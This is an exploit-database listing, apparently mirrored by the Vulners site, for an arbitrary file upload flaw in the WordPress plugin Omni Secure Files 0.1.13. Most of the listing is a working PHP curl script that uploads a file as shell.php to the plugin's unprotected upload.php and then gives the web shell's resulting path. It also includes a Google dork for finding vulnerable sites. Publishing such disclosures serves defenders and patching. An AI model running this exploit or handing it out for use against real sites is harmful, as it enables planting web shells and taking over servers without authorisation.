Lucene search
K

WordPress Plugin Omni Secure Files 0.1.13 - Arbitrary File Upload

🗓️ 07 Jun 2012 00:00:00Reported by Adrien ThierryType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 43 Views

WordPress Plugin Omni Secure Files 0.1.13 - Arbitrary File Upload vulnerabilit

Code
# Exploit Title: Wordpress Omni-secure-files 0.1.13 Arbitrary File Upload
# Google Dork: inurl:wp-content/plugins/omni-secure-files/
# Date: 07/06/2012
# Exploit Author: Adrien Thierry
# Vendor Homepage: http://omni-secure.com/
# Software Link: http://downloads.wordpress.org/plugin/omni-secure-files.zip
# Version: 0.1.13

Maybe some trash files, but page upload.php in folder "examples" is vulnerable to Remote File Upload. Code :

<?php
$u="whatelse.php";
$c = curl_init("http://server/wp-content/plugins/omni-secure-files/plupload/examples/upload.php");
curl_setopt($c, CURLOPT_POST, true);
curl_setopt($c, CURLOPT_POSTFIELDS,
array('file'=>"@$u",'name'=>"shell.php"));
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
$e = curl_exec($c);
curl_close($c);
echo $e; 
?>


Shell could be found at :
	http://server/wp-content/plugins/wp-content/plugins/omni-secure-files/plupload/examples/uploads/shell.php
	
#########################################################################################

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

07 Jun 2012 00:00Current
7.4High risk
Vulners AI Score7.4
43